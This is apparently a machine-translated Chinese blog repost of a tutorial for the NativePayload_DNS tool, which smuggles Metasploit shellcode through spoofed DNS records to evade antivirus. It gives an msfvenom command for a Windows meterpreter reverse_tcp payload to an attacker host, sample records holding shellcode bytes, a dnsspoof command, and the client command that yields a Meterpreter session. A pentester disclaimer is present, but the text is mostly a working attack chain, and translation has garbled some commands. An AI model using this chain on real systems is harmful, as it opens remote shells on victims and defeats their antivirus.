版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319
注意标点符号,必须是英文的。
通过DNS流量和绕过防病毒传输的后门有效负载的C#代码
由Damon Mohammadbagher发表
警告:此代码发布用于解释针对Pentesters和安全研究人员的反病毒漏洞
欲了解更多信息,请一步一步访问以下链接:
通过DNS流量绕过带有传输后门有效负载的反病毒或文章备份地址
视频由Damon Mohammadbagher发行(bbxc9x00x1f)
绕过反病毒与DNS流量传输后门有效负载视频(需要访问YouTube)
用NativePayload_DNS和Meterpreter_Payload_Detection绕过AV视频(需要访问YouTube)
视频说明:使用NativePayload_DNS.exe绕过AV并通过Meterpreter_Payload_Detection工具检测Meterpreter进程
步骤1:
msfvenom C类型的有效负载在你的kali linux
msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt
将有效载荷从payload.txt文件复制到dns.txt,格式如下:
root @ kali:〜#cat /root/Desktop/dns.txt
1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”
1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”
1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”
1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”
步骤2:在您的kali linux中制作假DNS服务器
root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt
步骤3:
在客户端运行代码
语法:
NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”
最后你可以绕过AV,你有Meterpreter Session
欲了解更多信息,请一步一步访问以下链接:
通过DNS流量绕过带有传输后门有效负载的反病毒
相关工具: 用于通过IPv6地址(AAAA)记录和DNS流量传输的Backdoor Payload的C#代码也绕过防病毒
相关链接: 用C#通过加密有效载荷绕过所有防病毒